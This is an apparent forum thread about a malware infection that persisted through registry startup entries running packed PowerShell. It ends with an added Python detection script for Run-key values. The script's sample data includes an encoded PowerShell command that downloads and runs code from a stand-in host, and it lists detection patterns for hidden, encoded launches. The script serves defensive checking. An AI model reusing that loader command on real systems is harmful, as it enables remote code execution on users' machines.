It's happened, I was hacked

My other half had her Facebook account compromised last week via a link in a message that grabbed the authentication token from her phone. Scared the **** out of her but maybe, just maybe, I’ll be able to get her to RTFM and other precautions in the future.
 
If you're downloading torrents of cracked games/software then you're asking to be hacked. It doesn't happen every time, but it's the only time I've come across viruses/malware etc.
 
I didn't have any cracked games or software on this PC, which is why I was so confused as to how I was infected. I'm not networked to other PCs either.

This malware installs itself to the registry and runs from it too which makes it very difficult to remove. It's being actively developed which is prob why no av could catch it. Apparently it primarily targets crypto, I guess when they found no crypto they went after other stuff.

I've been refunded by PayPal now and added an authenticator to my phone too.
 
I use NetLimiter and by default I force it to block then ask for permission to allow any ingoing or outgoing connections.

This was on the back of my machine constantly getting pinged by suspicious incoming IP addresses, mostly from China and Russia, under the guise of some sort of research program when you visited them. Seemed very dodgy, so at least I could block them. After a reformat they went away, despite your usual scanners picking up nothing. I could not have known about it for a long time though.
 
Offline clone of my OS drive and important data (photos of holidays, family, nights out and travelling) backed up on an external drive. Doesn't matter if my OS is hacked.
 
That's why I don't like WhatsApp: it can be misused and it's not safe. They go on about how it can't be hacked, the encryption is end to end, and they are going to pull out of the UK if the Wotsit Security bill is passed. You think you are safe, then something like this happens. You could say it's not WhatsApp, it's the PC being compromised, but WhatsApp was the method used to authorise the transaction.
 
I used all the antivirus yesterday and I could still see the PowerShell script loading in Event Viewer, so I had to bite the bullet and format with a fresh install...
With a Trojan I feel this is the best course of action. Unfortunately you will never be certain that Malwarebytes or another anti-malware has got everything and you won't get reinfected. It will only take that one zero day or start-up link and you start the whole process again.

If you use any removable media, and especially if you've used it since being infected, make sure to check it for any signs of infection from a known clean device.

Good you were refunded and lesson learned :)
 
I didn't have any cracked games or software on this PC, which is why I was so confused as to how I was infected. I'm not networked to other PCs either.

This malware installs itself to the registry and runs from it too which makes it very difficult to remove. It's being actively developed which is prob why no av could catch it. Apparently it primarily targets crypto, I guess when they found no crypto they went after other stuff.

I've been refunded by PayPal now and added an authenticator to my phone too.
Sorry, what? "Installs to the registry and runs from the registry?" What do you mean by this?
 
That's why I don't like WhatsApp: it can be misused and it's not safe. They go on about how it can't be hacked, the encryption is end to end, and they are going to pull out of the UK if the Wotsit Security bill is passed. You think you are safe, then something like this happens. You could say it's not WhatsApp, it's the PC being compromised, but WhatsApp was the method used to authorise the transaction.

WhatsApp really isn't the problem here. I can't say for certain what has happened, but this malware doesn't just install itself on your PC. Possibly it has been deployed bundled with other malware, but usually that'll be a dropper spread by something using worming behaviour on a network, which Frenzy said isn't the situation here.

Sorry, what? "Installs to the registry and runs from the registry?" What do you mean by this?

It doesn't install itself to the registry in the way they seem to be implying, but some of these script-heavy malware place startup registry entries which can reinfect the machine using packed PowerShell commands.
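One way to check for the kind of startup entry described above (a Run/RunOnce value that launches PowerShell with a packed payload), as an added example that is not from this thread or any of its posters. It works on a mapping of value name to command line, so it runs offline against the constructed sample entries below; the indicator patterns are an assumption, not a complete rule set, and the sample values are made up.

```python
"""Flag autorun values that launch packed PowerShell (constructed sample data)."""
import base64
import re

# Indicators often seen with script-heavy persistence; an assumption, not an exhaustive rule set.
SUSPICIOUS_PATTERNS = [
    r"-e(?:c|nc|ncodedcommand)?\b",          # -EncodedCommand and its short forms
    r"-nop(?:rofile)?\b",                     # skip profile scripts
    r"-w(?:indowstyle)?\s+hidden",            # hide the console window
    r"invoke-expression|\biex\b",             # run a string as code
    r"downloadstring|frombase64string",       # fetch or unpack a payload
]
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
POWERSHELL_RE = re.compile(r"powershell(?:\.exe)?|\bpwsh\b", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_entry(name, value):
    """Judge one autorun value: match indicators on the command line and on the decoded payload."""
    decoded = decode_encoded_command(value)
    text = value if decoded is None else value + " " + decoded
    hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, text, re.I)]
    launches_ps = POWERSHELL_RE.search(value) is not None
    # Plain PowerShell use (e.g. a backup script) is not enough on its own.
    return {"name": name, "decoded": decoded, "indicators": hits,
            "suspicious": launches_ps and bool(hits)}

def scan(entries):
    """Assess a {value_name: command_line} mapping, e.g. exported Run/RunOnce values."""
    return [assess_entry(n, v) for n, v in entries.items()]

# Constructed sample of three Run-key values: a benign app, a benign script, and a packed loader.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Backup": r"powershell.exe -File C:\Scripts\backup.ps1",
    "Updater": "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii"),
}
```

Calling `scan(SAMPLE_RUN_VALUES)` flags only the "Updater" value and returns its decoded payload, which is what you would want to read before deciding a machine needs the reformat discussed above.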
 